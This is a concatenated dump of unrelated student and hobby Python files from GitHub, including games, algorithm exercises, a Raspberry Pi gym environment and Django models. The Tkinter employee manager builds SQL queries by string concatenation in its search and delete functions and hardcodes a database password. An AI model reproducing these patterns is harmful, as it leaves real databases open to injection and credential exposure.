record_path_in_repeat.append(sub_record_path_in_repeat)\n record_path_in_bump.append(sub_record_path_in_bump)\n\n if count!=0:\n # average_data_time=data_time/count\n data_path_repeat[index_p]=data_path_repeat[index_p]/count\n data_path_bump[index_p]=data_path_bump[index_p]/count\n data_time_repeat[index_p]=data_time_repeat[index_p]/count\n data_time_bump[index_p]=data_time_bump[index_p]/count\n return data_path_repeat, data_time_repeat, data_path_bump, data_time_bump,record_path_in_repeat, record_path_in_bump\n\n\n\n\nif __name__ == '__main__':\n dim = 101\n data_path_repeat, data_time_repeat, data_path_bump, data_time_bump,record_path_in_repeat, record_path_in_bump = test(dim, NUM_EXPERIMENT)\n path=\"D:\\\\520\\\\data\"\n\n filename=\"repeatforwardAStar_path_average.json\"\n current_path=os.path.join(path,filename)\n with open(current_path,\"w\") as file_writer:\n data=json.dumps(data_path_repeat)\n file_writer.write(data)\n\n filename=\"bumprepeatforwardAStar_path_average.json\"\n current_path = os.path.join(path, filename)\n with open(current_path, \"w\") as file_writer:\n data = json.dumps(data_path_bump)\n file_writer.write(data)\n\n filename = \"repeatforwardAStar_time_average.json\"\n current_path = os.path.join(path, filename)\n with open(current_path, \"w\") as file_writer:\n data = json.dumps(data_time_repeat)\n file_writer.write(data)\n\n filename = \"bumprepeatforwardAStar_time_average.json\"\n current_path = os.path.join(path, filename)\n with 
open(current_path, \"w\") as file_writer:\n data = json.dumps(data_time_bump)\n file_writer.write(data)\n\n filename = \"repeatforwardAStar_path.json\"\n current_path = os.path.join(path, filename)\n with open(current_path, \"w\") as file_writer:\n data = json.dumps(record_path_in_repeat)\n file_writer.write(data)\n\n filename = \"bumprepeatforwardAStar_path.json\"\n current_path = os.path.join(path, filename)\n with open(current_path, \"w\") as file_writer:\n data = json.dumps(record_path_in_bump)\n file_writer.write(data)\n\n\n","repo_name":"wzzanthony/2021Fall_CS520","sub_path":"assignment1/final_project/find_path_saved.py","file_name":"find_path_saved.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"13378716878","text":"from tkinter import *\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import messagebox\nimport psycopg2\n\n \n\ndef update(rows):\n tree.delete(*tree.get_children())\n for i in rows:\n tree.insert('', 'end', values=i)\n\ndef search():\n if q.get() == '':\n messagebox.showerror('Ooops!', 'Please input text to search!')\n return\n q2 = q.get()\n query = \"Select employee_id, employee, branch, designation FROM tree WHERE employee LIKE '%\"+q2+\"%' OR branch LIKE '%\"+q2+\"%' OR designation LIKE '%\"+q2+\"%'\"\n cur.execute(query)\n rows = cur.fetchall()\n update(rows)\n\ndef clear_text():\n query = \"Select employee_id, employee, branch, designation FROM tree\"\n cur.execute(query)\n rows = cur.fetchall()\n ent1.delete(0, END)\n update(rows)\n\ndef getrow(event):\n rowid = tree.identify_row(event.y)\n item = tree.item(tree.focus())\n e1.set(item['values'][0])\n e2.set(item['values'][1])\n e3.set(item['values'][2])\n e4.set(item['values'][3])\n\n\ndef update_employee():\n if e1.get() == '' or e2.get() == '' or e3.get() == '' or e4.get() == '':\n messagebox.showerror('Ooops!', 'Please select an employee you want to update!')\n return\n employee_id = e1.get()\n employee = e2.get()\n branch = e3.get()\n designation = e4.get()\n if messagebox.askyesno(\"Confirm Please\", \"Are you sure you want to update this employee?\"):\n query = \"UPDATE tree SET employee = %s, branch = %s, designation = %s WHERE employee_id = %s\"\n cur.execute(query, (employee, branch, designation, employee_id))\n clear_text()\n conn.commit()\n else:\n return True\n\ndef add_employee():\n if e1.get() == '' or e2.get() == '' or e3.get() == '' or e4.get() == '':\n messagebox.showerror('Ooops!', 'Please input all fields !')\n return\n employee_id = e1.get()\n employee = e2.get()\n branch = e3.get()\n designation = e4.get()\n query = \"INSERT INTO tree(employee_id, employee, branch, designation) VALUES (%s, %s, %s, %s)\"\n cur.execute(query, (employee_id, employee, branch, designation))\n clear_text()\n conn.commit()\n return True\n\n\n\ndef delete_employee():\n if e1.get() == '' or e2.get() == '' or e3.get() == '' or e4.get() == '':\n messagebox.showerror('Ooops!', 'Please choose employee you want to delete!')\n return\n employee_id = e1.get()\n if messagebox.askyesno(\"Confirm Delete?\", \"Are you sure you want to delete this employee?\"):\n query = \"DELETE FROM tree WHERE employee_id = \" +employee_id\n cur.execute(query)\n conn.commit()\n clear_text()\n else:\n return True\n \n\n \nconn = psycopg2.connect(\n host = \"localhost\" , \n database = \"sample\",\n user = \"postgres\",\n password = \"windel1325\")\n\n\ncur = conn.cursor()\n\nwin = Tk()\nwin.configure(bg='grey')\nq= StringVar()\ne1= StringVar()\ne2= StringVar()\ne3= StringVar()\ne4= StringVar()\n\n\nwrapper1 = LabelFrame(win, text= \"Employee List\")\nwrapper2 = LabelFrame(win, text= \"Search\")\nwrapper3 = LabelFrame(win, text=\"Employee Data\")\n\nwrapper1.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\nwrapper2.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\nwrapper3.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\n\ntree_scroll = Scrollbar(wrapper1)\ntree_scroll.pack(side=RIGHT, fill=Y)\n\ntree = ttk.Treeview(wrapper1, columns=(1,2,3,4), show=\"headings\", height=\"6\", yscrollcommand=tree_scroll.set)\ntree.pack()\n\ntree_scroll.configure(command=tree.yview)\n\ntree.heading(1, text=\"Employee ID\")\ntree.heading(2, text=\"Employee Name\")\ntree.heading(3, text=\"Branch\")\ntree.heading(4, 
text=\"Designation\")\n\ntree.bind('', getrow)\n\nquery = \"Select employee_id, employee, branch, designation from tree\"\ncur.execute(query)\nrows = cur.fetchall()\nupdate(rows)\n\n\nlabel1 = Label(wrapper2, text=\"Search\")\nlabel1.pack(side=tk.LEFT, padx=10)\nent1 = Entry(wrapper2, textvariable=q)\nent1.pack(side=tk.LEFT, padx=6)\nbutton1 = Button(wrapper2, text=\"Search\", command=search)\nbutton1.pack(side=tk.LEFT, padx=6)\nbutton2 = Button(wrapper2, text=\"Clear Search\", command=clear_text)\nbutton2.pack(side=tk.LEFT, padx=6)\n\nlabel2 = Label(wrapper3, text=\"Employee ID\")\nlabel2.grid(row=0, column=0, padx=5, pady=3)\nent2 = Entry(wrapper3, textvariable=e1)\nent2.grid(row=0, column=1, padx=5, pady=3)\n\nlabel3 = Label(wrapper3, text= \"Employee Name\")\nlabel3.grid(row=1, column=0, padx=5, pady=3)\nent3 = Entry(wrapper3, textvariable=e2)\nent3.grid(row=1, column=1, padx=5, pady=3)\n\nlabel4 = Label(wrapper3, text= \"Branch\")\nlabel4.grid(row=2, column=0, padx=5, pady=3)\nent4 = Entry(wrapper3, textvariable=e3)\nent4.grid(row=2, column=1, padx=5, pady=3)\n\nlabel5 = Label(wrapper3, text= \"Designation\")\nlabel5.grid(row=3, column=0, padx=5, pady=3)\nent5 = Entry(wrapper3, textvariable=e4)\nent5.grid(row=3, column=1, padx=5, pady=3)\n\nbtn_update = Button(wrapper3, text=\"Update\", command=update_employee)\nbtn_add = Button(wrapper3, text=\"Add New\", command=add_employee)\nbtn_delete = Button(wrapper3, text=\"Delete\", command=delete_employee)\n\nbtn_add.grid(row=4,column=0, padx=5, pady=3)\nbtn_update.grid(row=4, column=1, padx=5, pady=3)\nbtn_delete.grid(row=4, column=2, padx=5, pady=3)\n\n\n\n\n\n\n\n\n\nwin.title(\"Employee Table\")\nwin.geometry(\"800x700\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nwin.mainloop()\n","repo_name":"windelsalazar/sample","sub_path":"treeview.py","file_name":"treeview.py","file_ext":"py","file_size_in_byte":5304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"69890291746","text":"import numpy as np\n\n\ndef inputMatrix():\n m = []\n n = input()\n for i in range(0, int(n[0])):\n s = input()\n row = []\n for j in s.split():\n if j.isdigit() == True:\n row.append(int(j))\n m.append(row)\n return m\n\n\ndef multiMatrix(m1, m2):\n array1 = np.array(m1)\n array2 = np.array(m2)\n result = np.dot(array1, array2)\n r = result.tolist()\n return r\n\n\ndef printMatrix(m):\n # your code\n for i in range(0, len(m)):\n for j in range(0, len(m[i])):\n if j != len(m[i]) - 1:\n print(m[i][j], end=\" \")\n else:\n print(m[i][j], end=\"\")\n if i != len(m) - 1:\n print()\n\n\nn1 = input()\nm1 = inputMatrix()\nm2 = inputMatrix()\n\nmm = multiMatrix(m1, m2)\nprintMatrix(mm)\n","repo_name":"kaminokokoro/https---github.com-kaminokokoro-programming-for-data-science","sub_path":"week2/MultiMatrix.py","file_name":"MultiMatrix.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"26233710474","text":"from collections import deque\n\nN, K = map(int, input().split())\n\ndeq = deque([i for i in range(1, N+1)])\n\nans = []\nwhile len(deq) != 0:\n for _ in range(K-1):\n #k-1번째 노드까지 deq 맨 뒤로 이동\n deq.append(deq.popleft())\n #k번째 노드 삭제 후 결과에 추가\n ans.append(str(deq.popleft()))\n\nprint('<'+', '.join(ans)+'>')\n","repo_name":"SESAC2023/jooyoung_song","sub_path":"BOJ/20. 큐, 덱/11866.py","file_name":"11866.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"3160531372","text":"import gym\nfrom gym import error, spaces, utils\nimport numpy\nimport time\nimport os\nimport RPi.GPIO as gpio\n\n\nclass LineFollowerEnv(gym.Env):\n\n def __init__(self):\n gym.Env.__init__(self)\n\n gpio.setmode(gpio.BCM)\n gpio.setup(19, gpio.OUT) # Left motor\n gpio.setup(26, gpio.OUT) # Right motor\n\n gpio.setup(16, gpio.IN) # Left sensor\n gpio.setup(20, gpio.IN) # Middle sensor\n gpio.setup(21, gpio.IN) # Right sensor\n \n self.observation_space = spaces.MultiBinary(3)\n\n self.action_space = spaces.Discrete(3)\n\n self.actions = [] \n\n def right_turn():\n gpio.output(19, 1)\n time.sleep(0.4)\n gpio.output(19, 0)\n\n def left_turn():\n gpio.output(21, 1)\n time.sleep(0.4)\n gpio.output(21, 0)\n \n def straight():\n gpio.output(21, 1)\n gpio.output(19, 1)\n time.sleep(0.4)\n gpio.output(21, 0)\n gpio.output(19, 0)\n \n self.actions.append(left_turn()) # Right motor on\n self.actions.append(straight()) # Both motors on\n self.actions.append(right_turn()) # Left motor on\n\n self.reset()\n\n def reset(self):\n\n self.observation = None\n self.reward = 0.0\n self.done = False\n self.info = {}\n\n time.sleep(10)\n self.observation = self._update_observation()\n return self.observation\n\n def step(self, action):\n \n self.actions[action]\n self.done = False\n self.reward = 0.0\n\n self.observation = self._update_observation()\n\n if str(self.observation) == \"[0. 1. 0.]\":\n self.reward = 1\n elif str(self.observation) == \"[1. 1. 1.]\":\n self.reward = -0.5 \n elif str(self.observation) == \"[1. 1. 0.]\":\n self.reward = 0.8\n elif str(self.observation) == \"[0. 1. 1.]\":\n self.reward = 0.8\n elif str(self.observation) == \"[1. 0. 0.]\": \n self.reward = 0.4\n elif str(self.observation) == \"[0. 0. 1.]\": \n self.reward = 0.4\n else:\n self.reward = -1\n \n return self.observation, self.reward, self.done, self.info\n \n def render(self):\n pass\n \n def _update_observation(self):\n \n observation = numpy.zeros(3)\n \n if gpio.input(16) == 1:\n print(\"LEFT\")\n observation[0] = 1 \n if gpio.input(20) == 1:\n print(\"MIDDLE\")\n observation[1] = 1\n if gpio.input(21) == 1:\n print(\"RIGHT\")\n observation[2] = 1\n print(observation)\n\n return observation\n ","repo_name":"Kapitalisti666/Future_IoT_Technologies_project","sub_path":"scripts/linefollower_env_raspberry.py","file_name":"linefollower_env_raspberry.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70590980386","text":"import tkinter\nfrom tkinter import Frame, Canvas\nimport PIL\nfrom PIL import Image, ImageTk, ImageDraw\n\nwidth = 200\nheight = 200\n\nif __name__ == \"__main__\":\n root = tkinter.Tk()\n\n frame = Frame(root, bd=2, relief=tkinter.SUNKEN, width=width, height=height)\n frame.grid_rowconfigure(0, weight=1)\n frame.grid_columnconfigure(0, weight=1)\n canvas = Canvas(frame, bd=0, width=width, height=height)\n canvas.grid(row=0, column=0)\n frame.pack(fill=tkinter.BOTH, expand=1)\n\n def click(event):\n x, y = event.x, event.y\n print('click {:d} {:d}'.format(x, y))\n\n def motion(event):\n x, y = event.x, event.y\n print('motion {:d} {:d}'.format(x, y))\n\n canvas.bind(\"\", click)\n canvas.bind('', motion)\n\n img = PIL.Image.new('RGBA', (width, height))\n\n # Paint red.\n pixels = img.load()\n for y in range(height):\n for x in range(width):\n pixels[x, y] = (255, 0, 0, 255)\n\n # Draw crossed white lines.\n draw = ImageDraw.Draw(img)\n draw.line((0, 0) + img.size, fill=128)\n draw.line((0, img.size[1], img.size[0], 0), fill=128)\n\n pi = PIL.ImageTk.PhotoImage(img)\n sprite = canvas.create_image(100, 100, image=pi)\n canvas.update()\n\n root.mainloop()\n","repo_name":"LennMars/icfpc2017","sub_path":"sample/tkinter_sample.py","file_name":"tkinter_sample.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"17741089881","text":"import pygame\nimport math\nfrom pygame.locals import *\n\n\nclass Bomb(pygame.sprite.Sprite):\n\n def __init__(self, screen_size, imageFile, scale, name, posx, posy, damage, max_speed):\n # Définit les éléments de sprite:\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(imageFile)\n self.rect = self.image.get_rect()\n\n # Mise à l'échelle du sprite:\n self.new_scale = (round(self.rect.width * scale * 1.09),\n round(self.rect.height * scale * 1.09))\n self.image = pygame.transform.scale(self.image, self.new_scale)\n self.rect = self.image.get_rect()\n\n # Nom du Projectile:\n self.name = name\n\n # Taille de l'écran:\n self.screen_w, self.screen_h = screen_size\n\n # Définit la position initiale:\n self.rect.x = posx\n self.rect.y = posy\n\n # Définit la vitesse initiale et l'angle, startx et starty:\n self.speed = 0\n self.angle = 0\n self.startx = 0\n self.starty = 0\n\n # Définit le mouvement:\n self.moving = False\n\n # Définit le temps:\n self.time = 0\n\n # Définit les dégâts:\n self.damage = damage\n\n # Définit la vitesse maximale du projectile\n self.maxSpeed = max_speed\n\n def move(self):\n # Calcule Vx:\n velocity_x = math.cos(math.radians(self.angle)) * self.speed\n # Calcule Vy\n velocity_y = math.sin(math.radians(self.angle)) * self.speed\n\n # Calcule la distance totale parcourue sur l'axe X:\n distance_x = velocity_x * self.time\n # Calcule la distance totale parcourue sur l'axe Y:\n distance_y = (velocity_y * self.time) + ((-9.81 * (self.time ** 2)) / 2)\n\n # Calcule la nouvelle coordonnée sur l’axe X:\n new_x = round(self.startx + distance_x)\n # Calcule la nouvelle coordonnée sur l’axe Y:\n new_y = round(self.starty - distance_y)\n\n # Ajoute à la durée d'objet:\n self.time += 0.1\n\n # Vérifie si l'image de l'objet est au-dessus du bas de la fenêtre, le cas échéant:\n if new_y <= self.screen_h - self.rect.height\\\n and new_x >= 0\\\n and new_x <= self.screen_w - self.rect.width:\n self.rect.x = new_x\n self.rect.y = new_y\n else:\n self.moving = False\n self.time = 0\n self.rotate_angle = 0\n self.rect.y = self.screen_h - self.rect.height\n\n def stop_movement(self):\n # Arrête le mouvement du sprite et réinitialise ses attributs:\n self.moving = False\n self.time = 0\n self.rotate_angle = 0\n self.rect.y = self.screen_h - self.rect.height\n\n def reset_stats(self):\n # Arrête le mouvement du sprite et réinitialise ses attributs:\n self.moving = False\n self.time = 0\n self.rotate_angle = 0\n self.rect.x = 0\n self.rect.y = 0\n\n def update(self):\n if self.moving == True: # Vérifie si la balle est en mouvement, si oui:\n self.move() # Déplace la balle une fois\n","repo_name":"alexxandre80/Projet_Python","sub_path":"class_bomb.py","file_name":"class_bomb.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"74604006627","text":"import turtle\nimport os\n\n# Global Variables\nis_paused = True\n\nwn = turtle.Screen()\nwn.title(\"PLAY PONG\")\nwn.bgcolor(\"black\")\nwn.setup(width=800, height=600)\nwn.tracer(0)\n\n# Score\nscore_a = 0\nscore_b = 0\n\n# Paddle A\npaddle_a = turtle.Turtle()\npaddle_a.speed(0)\npaddle_a.shape(\"square\")\npaddle_a.color(\"white\")\npaddle_a.shapesize(stretch_wid=5, stretch_len=1)\npaddle_a.penup()\npaddle_a.goto(-350, 0)\n\n# Paddle B\npaddle_b = turtle.Turtle()\npaddle_b.speed(0)\npaddle_b.shape(\"square\")\npaddle_b.color(\"white\")\npaddle_b.shapesize(stretch_wid=5, stretch_len=1)\npaddle_b.penup()\npaddle_b.goto(350, 0)\n\n# Ball\nball = turtle.Turtle()\nball.speed(0)\nball.shape(\"circle\")\nball.color(\"blue\")\nball.penup()\nball.goto(0, 0)\nball.dx = 0.2\nball.dy = 0.2\n\n# Pen\npen = turtle.Turtle()\npen.speed(0)\npen.color(\"white\")\npen.penup()\npen.hideturtle()\npen.goto(0, 260)\npen.write(\"Press SPACE KEY to start\",align=\"center\", font=(\"Courier\",24,\"normal\"))\npen.write(f\"Player A : 0 Player B : 0\", align=\"center\", font=(\"Courier\", 24, \"normal\"))\n\nstart_button = turtle.Turtle()\nstart_button.speed(0)\nstart_button.color(\"white\")\nstart_button.penup()\nstart_button.hideturtle()\nstart_button.goto(0, -50) # Position the button below the score display\nstart_button.write(\"Start\", align=\"center\", font=(\"Courier\", 24, \"normal\"))\n\n# List of ball colors\nball_colors = [\"blue\", \"red\", \"green\", \"yellow\", \"orange\"]\ncurrent_color_index = 0\n\n# Functions\ndef toggle_pause():\n global is_paused\n is_paused = not is_paused\n\ndef reset_positions():\n paddle_a.goto(-350, 0)\n paddle_b.goto(350, 0)\n ball.goto(0, 0)\n\n# Add a function to reset the game\ndef reset_game():\n global score_a, score_b\n score_a = 0\n score_b = 0\n reset_positions()\n pen.clear()\n pen.write(\"Player A : {} Player B : {}\".format(score_a, score_b), align=\"center\", font=(\"Courier\", 24, \"normal\"))\n\ndef start_game():\n global is_paused\n is_paused = False\n pen.clear()\n start_button.clear()\n \ndef paddle_a_up():\n if (paddle_a.ycor() > 239):\n return\n else:\n y = paddle_a.ycor()\n y += 20\n paddle_a.sety(y)\n\ndef paddle_a_down():\n if (paddle_a.ycor() < -239):\n return\n else:\n y = paddle_a.ycor()\n y -= 20\n paddle_a.sety(y)\n\ndef paddle_b_up():\n if (paddle_b.ycor() > 239):\n return\n else:\n y = paddle_b.ycor()\n y += 20\n paddle_b.sety(y)\n\ndef paddle_b_down():\n if (paddle_b.ycor() < -239):\n return\n else:\n y = paddle_b.ycor()\n y -= 20\n paddle_b.sety(y)\n\ndef start_button_click(x, y):\n if -40 < x < 40 and -80 < y < -20:\n start_game()\n\n# Keyboard binding\nwn.listen()\nwn.onkeypress(paddle_a_up, \"w\")\nwn.onkeypress(paddle_a_down, \"s\")\nwn.onkeypress(paddle_b_up, \"Up\")\nwn.onkeypress(paddle_b_down, \"Down\")\nwn.onkeypress(toggle_pause, \"p\")\nwn.onkeypress(reset_game, \"r\")\nwn.onkeypress(start_game, \"space\")\nwn.onclick(start_button_click)\n\n# Call reset_game function to initialize the game\nreset_game()\n\n# Main game loop\nwhile True:\n wn.update()\n\n if not is_paused:\n # Move the ball\n ball.setx(ball.xcor() + ball.dx)\n ball.sety(ball.ycor() + ball.dy)\n\n # Border Checking\n if ball.ycor() > 290:\n ball.sety(290)\n ball.dy *= -1\n current_color_index = (current_color_index + 1) % len(ball_colors)\n ball.color(ball_colors[current_color_index])\n\n if ball.ycor() < -290:\n ball.sety(-290)\n ball.dy *= -1\n current_color_index = (current_color_index + 1) % len(ball_colors)\n 
ball.color(ball_colors[current_color_index])\n\n if ball.xcor() > 390:\n ball.goto(0, 0)\n ball.dx *= -1\n score_a += 1\n pen.clear()\n pen.write(\"Player A : {} Player B : {}\".format(score_a, score_b), align=\"center\", font=(\"Courier\", 24, \"normal\"))\n current_color_index = (current_color_index + 1) % len(ball_colors)\n ball.color(ball_colors[current_color_index])\n\n if ball.xcor() < -390:\n ball.goto(0, 0)\n ball.dx *= -1\n score_b += 1\n pen.clear()\n pen.write(\"Player A : {} Player B : {}\".format(score_a, score_b), align=\"center\", font=(\"Courier\", 24, \"normal\"))\n current_color_index = (current_color_index + 1) % len(ball_colors)\n ball.color(ball_colors[current_color_index])\n\n # Paddle and ball collision\n if (ball.xcor() > 340 and ball.xcor() < 350) and (ball.ycor() < paddle_b.ycor() + 50 and ball.ycor() > paddle_b.ycor() - 50):\n ball.setx(340)\n ball.dx *= -1\n current_color_index = (current_color_index + 1) % len(ball_colors)\n ball.color(ball_colors[current_color_index])\n\n if (ball.xcor() < -340 and ball.xcor() > -350) and (ball.ycor() < paddle_a.ycor() + 50 and ball.ycor() > paddle_a.ycor() - 50):\n ball.setx(-340)\n ball.dx *= -1\n current_color_index = (current_color_index + 1) % len(ball_colors)\n ball.color(ball_colors[current_color_index])","repo_name":"Vadi26/se-pygame","sub_path":"Pong.py","file_name":"Pong.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1240452345","text":"#Open data and read it as a list of float numbers\ndata = open(\"E:\\data.txt\").read() #open and read as a string\ntex= data.replace(\"\\n\" , \" \") #replacing the newlines with spaces\ntext = data.replace(\",\" , \" \") #replacing the commas with spaces\nlst_data = text.split() #converting a string to a list of strings\nlst = []\nfor index in lst_data: #taking each index of above list and converting to a float\n lst.append(float(index)) #and appending to a new list\n\n\n#first Question: calculating the durations\nduration_list = []\nfor i in range(len(lst)-1): # to solve the error of out of range index since there is\n elements = lst[i+1]-lst[i] # only one data in the end of the list\n duration_list.append(elements) # append the durations to a new list\n\n\n#constructing a description string\ndescription_list = [] #initializing a description list\ndescription = \"\" #initializing a string variable\nfor durations in duration_list:\n if durations < 700:\n description_list.append(\"S\")\n elif durations > 800:\n description_list.append(\"L\") #appending string to the description list\n else:\n description_list.append(\"M\")\nfor i in description_list:\n description = description + i #converting the list of strings to a string\nprint(description)\n\n\ndef func(event, string):\n new_lst = []\n for element in range(len(string)):\n if string[element:element + (len(event))] == event:\n new_lst.append(element)\n return new_lst\n\n\nevent_dict = list()\nfor event in [\"LSL\", \"LSSL\", \"LSSSL\", \"LSSSSL\"] :\n event_dict.append((event, func(event, description)))\n\nprint(event_dict)\n\n\n\n\n\n\n","repo_name":"solmazahmadi/ChallangeOne","sub_path":"duration.py","file_name":"duration.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"40075667531","text":"import random\n#Welcome\nprint(\"Welcome to the Rock,Paper,Scissor Game\\n\\t Are you ready?(y/n)\")\nready=input(\"\\t\")\nif ready=='y':\n print(\"\\tGreat! Here we go..........\\n\\tEnter your name:\")\n name=input(\"\\t\")\n if len(name)<3:\n print(\"Enter a valid name! :(\")\n name=input(\"\\tEnter your name:\\n\\t\")\n if len(name)<3:\n print(\"Entered invalid name! :(\\n*****Sorry try later*****\")\n exit(0)\n else:\n print(\"Welcome \\\"\" +name+\"\\\" Good to see you\") \nelse:\n print(\":| Okay, see you soon\")\n exit(0)\n#Section after name\nprint(\"Select '1' if you know how to play\\nSelect '2' if you don't know how to play\")\nknow=int(input())\nif know==2:\n print('''This how to play:\\nPress following keys:\\nr --> Rock(r)\\np --> Paper(p)\\ns --> Scissor(s)''')\nelse:\n print('Hmmm, it seems you know the how to play:')\n######game functions######\ndef start(): \n print(\"\\t***The Game begins:***\")\n print(\"Computer's turn\\n select hidden :)))\")\n r=random.randint(1,3)#comp turn\n if r==1:\n comp='r'\n elif r==2:\n comp='p'\n elif r==3:\n comp='s'\n\n you=input(\"Your turn:\\n\")\n p=game(comp,you)\n print(f\"Computer select:{comp}\\nYou select:{you}\")\n result=gamewin(p)\n again=input(\"Want to play again?(y/n)\")\n if again=='y':\n return start()\n else:\n print(\"Ok! See you later\")\n exit(0)\ndef game(comp,you):\n if comp==you:\n return None\n elif comp == 'r':\n if you == 'p':\n return True\n elif you == 's':\n return False\n elif comp == 'p':\n if you == 's':\n return True\n elif you == 'r':\n return False\n elif comp == 's':\n if you == 'r':\n return True\n elif you == 'p':\n return False\n\ndef gamewin(p):\n if p== None:\n print(\"The game is tie :|\")\n elif p:\n print(\"Congratulations! You won :)\")\n else:\n print(\"Sorry! You Loss :(\")\n\n\n\nstart()\n","repo_name":"Smit-D/stone-paper-scissor-game","sub_path":"sps.py","file_name":"sps.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"16066373887","text":"from tree import Node\n\ndef checkPerfectUtil(root, leafLevel, lvl):\n if root.left is None and root.right is None:\n return lvl == leafLevel\n if root.left is None or root.right is None:\n return False\n return checkPerfectUtil(root.left, leafLevel, lvl + 1) and checkPerfectUtil(root.right, leafLevel, lvl + 1)\n\ndef checkPerfectBinaryTree(root):\n if root is None:\n return True\n level = 0\n current = root\n while current.left:\n level += 1\n current = current.left\n return checkPerfectUtil(root, level, 0)\n\n'''\n 1\n / \\\n 2 3\n / \\ / \\\n 4 5 6 7\n'''\nroot = Node(8)\n\nroot.left = Node(3)\nroot.right = Node(10)\n\n\nroot.left.left = Node(1)\nroot.left.right = Node(16)\nroot.right.left = Node(11)\nroot.right.right = Node(14)\n\n\nroot.left.left.left = Node(12)\nroot.left.left.right = Node(20)\nroot.left.right.left = Node(4)\nroot.left.right.right = Node(7)\nroot.right.left.left = Node(13)\nroot.right.left.right = Node(11)\nroot.right.right.left = Node(19)\nroot.right.right.right = Node(2)\n\n\nprint(checkPerfectBinaryTree(root))\n\n","repo_name":"embydextrous/Interview","sub_path":"binarytree/checkingPrinting/6-checkPerfectBinaryTree.py","file_name":"6-checkPerfectBinaryTree.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"41918078276","text":"\"\"\"`sys` module's `stdout` and `stderr`.\"\"\"\n\nimport sys\n\nfrom _pytest.capture import CaptureFixture\n\n\ndef test_write_stdout_stderr(capsys: CaptureFixture) -> None:\n \"\"\"Write to standard out and error.\"\"\"\n sys.stdout.write(\"standard out\")\n sys.stderr.write(\"standard error\")\n\n out, err = capsys.readouterr()\n assert out == \"standard out\"\n assert err == \"standard error\"\n\n\ndef test_print_stdout_stderr(capsys: CaptureFixture) -> None:\n \"\"\"Print to standard out and error.\"\"\"\n print(\"standard out\")\n print(\"standard error\", file=sys.stderr)\n\n out, err = capsys.readouterr()\n assert out == \"standard out\\n\"\n assert err == \"standard error\\n\"\n","repo_name":"jashburn8020/the-python-tutorial","sub_path":"src/ch10/sys_stdout_stderr_test.py","file_name":"sys_stdout_stderr_test.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"17522376813","text":"from django.db import models\nfrom .utils import unique_slug_generator,jcal,Shortner\nfrom django.db.models.signals import pre_save\nfrom ckeditor.fields import RichTextField\nfrom ckeditor_uploader.fields import RichTextUploadingField\nimport random\nfrom django.db.models import Q\nimport os\nfrom django.utils import timezone\nfrom django.utils.html import format_html\nfrom django.core.files.storage import FileSystemStorage\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom root import settings\nfrom django.contrib.auth.models import AbstractBaseUser,BaseUserManager\n\nclass MyUserManager(BaseUserManager):\n def create_user(self, email, password=None):\n if not email:\n raise ValueError('Users must have an email address')\n\n user = self.model(\n email=self.normalize_email(email),\n )\n user.set_password(password)\n user.save(using=self._db)\n return user\n\n\nclass User(AbstractBaseUser):\n email = models.CharField(max_length = 250,unique=True)\n lastname = models.CharField(max_length = 150 , blank=True)\n firstname = models.CharField(max_length = 150 , blank=True)\n profile_img = models.ImageField(upload_to='Users/Profile/' , blank=True)\n create_time = models.DateTimeField(auto_now=True)\n active = models.BooleanField(default=True)\n submit_email = models.BooleanField(default=False)\n \n objects = MyUserManager()\n #REQUIRED_FIELDS = ['lastname','firstname']\n USERNAME_FIELD = 'email'\n def __str__(self):\n return f\"Email : {self.email} ID : {self.id}\"\n\n def has_perm(self, perm, obj=None):\n return True\n \n def has_module_perms(self, app_label):\n return True\n \n def fullname(self):\n name = self.lastname + self.firstname\n return name\n \n class Meta:\n verbose_name = 'User'\n verbose_name_plural = 'Users'\n\n\ntemplatefs = FileSystemStorage(location='cms/templates/page/')\n\n# Create your models here.\n\nclass pwsrest(models.Model):\n email = models.CharField(max_length=150)\n uuid=models.CharField(max_length=250,unique=True)\n status = models.BooleanField(default=False)\n date = models.DateField(default=timezone.now) \n time = models.TimeField(default=timezone.now)\n def __str__(self):\n return self.email\n class Meta:\n verbose_name = 'pwsrest'\n verbose_name_plural = 'pwsrest'\n\n################################Blog model#############################\n\n\n\n\n\n\n\n\n#####blog manager to customize queries\nclass BlogManager(models.Manager):\n ####search\n def search(self,q):\n lookup = Q(title__icontains=q) | Q(body__icontains=q) | Q(my_tags__title__icontains=q)\n if len(lookup) > 0:\n return self.get_queryset().filter(lookup,active=True).distinct()\n else:\n return None\n\n\n\n def active_Blogs(self):\n qs=self.get_queryset().filter(active=True)\n if qs.count() >= 